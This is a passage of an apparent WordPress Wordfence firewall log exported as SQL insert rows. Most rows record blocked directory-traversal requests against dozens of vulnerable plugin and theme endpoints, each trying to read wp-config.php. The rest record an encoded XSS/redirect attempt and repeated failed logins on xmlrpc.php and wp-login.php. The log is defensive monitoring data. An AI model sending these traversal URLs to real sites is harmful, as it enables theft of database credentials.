Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(6598,1629477670.503028,1629477669.893500,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hc3Bvc2UtZG9jLWV4cG9ydGVyL2FzcG9zZV9kb2NfZXhwb3J0ZXJfZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6599,1629477670.495346,1629477669.913400,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/mac-dock-gallery/macdownload.php?albid=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thbGJpZF0=\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tYWMtZG9jay1nYWxsZXJ5L21hY2Rvd25sb2FkLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(6600,1629477670.411108,1629477669.882800,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/db-backup/download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kYi1iYWNrdXAvZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6601,1629477670.283839,1629477669.503300,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/themes/churchope/lib/downloadlink.php?file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2NodXJjaG9wZS9saWIvZG93bmxvYWRsaW5rLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(6602,1629477670.262337,1629477669.899000,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6603,1629477670.235337,1629477669.532700,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tsaWJwYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zbmlwbGV0cy9tb2R1bGVzL3N5bnRheF9oaWdobGlnaHQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6604,1629477669.998332,1629477669.490800,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlcGF0aF0=\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaW1wbGUtaW1hZ2UtbWFuaXB1bGF0b3IvY29udHJvbGxlci9kb3dubG9hZC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(6605,1629477669.969784,1629477669.427600,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/themes/mTheme-Unus/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlc10=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL21UaGVtZS1VbnVzL2Nzcy9jc3MucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6606,1629477669.938716,1629477669.421800,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/tera-charts/charts/treemap.php?fn=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmbl0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy90ZXJhLWNoYXJ0cy9jaGFydHMvdHJlZW1hcC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(6607,1629477669.938325,1629477669.433400,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/themes/NativeChurch/download/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL05hdGl2ZUNodXJjaC9kb3dubG9hZC9kb3dubG9hZC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(6608,1629477669.880256,1629477669.432800,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(6609,1629477669.500356,1629477668.822400,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/recent-backups/download-file.php?file_link=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlX2xpbmtd\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yZWNlbnQtYmFja3Vwcy9kb3dubG9hZC1maWxlLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(6610,1629477668.121324,1629477667.855100,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tteVBhdGhd\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9teWdhbGxlcnkvbXlmdW5jdGlvbnMvbXlnYWxsZXJ5YnJvd3Nlci5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(6611,1629477667.096724,1629477666.780300,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thYnNwYXRoXQ==\",\"paramValue\":\"Li4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9taW5pLW1haWwtZGFzaGJvYXJkLXdpZGdldHdwLW1pbmktbWFpbC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(6612,1629477667.034268,1629477666.645400,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb29nbGUtZG9jdW1lbnQtZW1iZWRkZXIvbGlicy9wZGYucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6613,1629477667.007034,1629477666.627500,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb29nbGUtbXAzLWF1ZGlvLXBsYXllci9kaXJlY3RfZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6614,1629477666.437833,1629477666.125800,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jaGVycnktcGx1Z2luL2FkbWluL2ltcG9ydC1leHBvcnQvZG93bmxvYWQtY29udGVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(6615,1629477665.172242,1629477664.889900,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-admin/admin.php?page=multi_metabox_listing&action=edit&id=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpZF0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(6616,1629477665.080723,1629477664.791900,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/force-download.php?file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvZm9yY2UtZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6617,1629477664.762872,1629477664.492000,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update&cpabc_calendar_update=1&id=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpZF0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6618,1629477664.156410,1629477663.875200,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-admin/admin-ajax.php?action=kbslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6619,1629477663.095733,1629477662.811700,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t0aHVtYl0=\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6620,1629477662.307261,1629477662.014400,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6621,1629477662.171068,1629477661.900800,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6622,0.000000,1629477805.033147,'\0\0\0\0\0\0\0\0\0\0���Z�_',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6623,0.000000,1629478032.312974,'\0\0\0\0\0\0\0\0\0\0����',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(6624,0.000000,1629478677.234693,'\0\0\0\0\0\0\0\0\0\0��]r��',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6625,0.000000,1629479428.347530,'\0\0\0\0\0\0\0\0\0\0���`J',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6626,0.000000,1629479591.981018,'\0\0\0\0\0\0\0\0\0\0��C�=�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36','loginFailValidUsername',NULL,NULL),(6627,0.000000,1629480090.646645,'\0\0\0\0\0\0\0\0\0\0���\0�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6628,0.000000,1629480696.012034,'\0\0\0\0\0\0\0\0\0\0����dl',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6629,0.000000,1629481193.721875,'\0\0\0\0\0\0\0\0\0\0����8�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','loginFailValidUsername',NULL,NULL),(6630,0.000000,1629481236.118330,'\0\0\0\0\0\0\0\0\0\0��#�K�',0,200,0,1,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(6631,0.000000,1629481242.670737,'\0\0\0\0\0\0\0\0\0\0��#�K�',0,200,0,1,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(6632,0.000000,1629481247.127490,'\0\0\0\0\0\0\0\0\0\0��#�K�',0,200,0,1,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(6633,0.000000,1629481255.791651,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6634,0.000000,1629481857.869527,'\0\0\0\0\0\0\0\0\0\0��E��x',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6635,0.000000,1629482842.518632,'\0\0\0\0\0\0\0\0\0\0��mW�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','loginFailValidUsername',NULL,NULL),(6636,0.000000,1629483018.291851,'\0\0\0\0\0\0\0\0\0\0���VE3',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6637,0.000000,1629483609.780254,'\0\0\0\0\0\0\0\0\0\0���3�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6638,0.000000,1629484180.475736,'\0\0\0\0\0\0\0\0\0\0���\"<�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6639,0.000000,1629484507.415782,'\0\0\0\0\0\0\0\0\0\0�����q',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','loginFailValidUsername',NULL,NULL),(6640,0.000000,1629484753.827318,'\0\0\0\0\0\0\0\0\0\0���\n',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6641,0.000000,1629485359.089385,'\0\0\0\0\0\0\0\0\0\0��4���',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6642,0.000000,1629485974.883573,'\0\0\0\0\0\0\0\0\0\0����E.',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6643,0.000000,1629486156.464321,'\0\0\0\0\0\0\0\0\0\0����y',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36','loginFailValidUsername',NULL,NULL),(6644,0.000000,1629486506.133704,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6645,0.000000,1629487093.351329,'\0\0\0\0\0\0\0\0\0\0��C��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6646,0.000000,1629487697.159893,'\0\0\0\0\0\0\0\0\0\0��C��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6647,0.000000,1629487802.006776,'\0\0\0\0\0\0\0\0\0\0��^x�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6648,0.000000,1629488258.670571,'\0\0\0\0\0\0\0\0\0\0��Kw��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6649,0.000000,1629488883.988886,'\0\0\0\0\0\0\0\0\0\0��\\̆�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6650,0.000000,1629489447.167364,'\0\0\0\0\0\0\0\0\0\0��`}��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36','loginFailValidUsername',NULL,NULL),(6651,0.000000,1629489500.520613,'\0\0\0\0\0\0\0\0\0\0���D�$',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6652,0.000000,1629490174.415136,'\0\0\0\0\0\0\0\0\0\0��xO�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 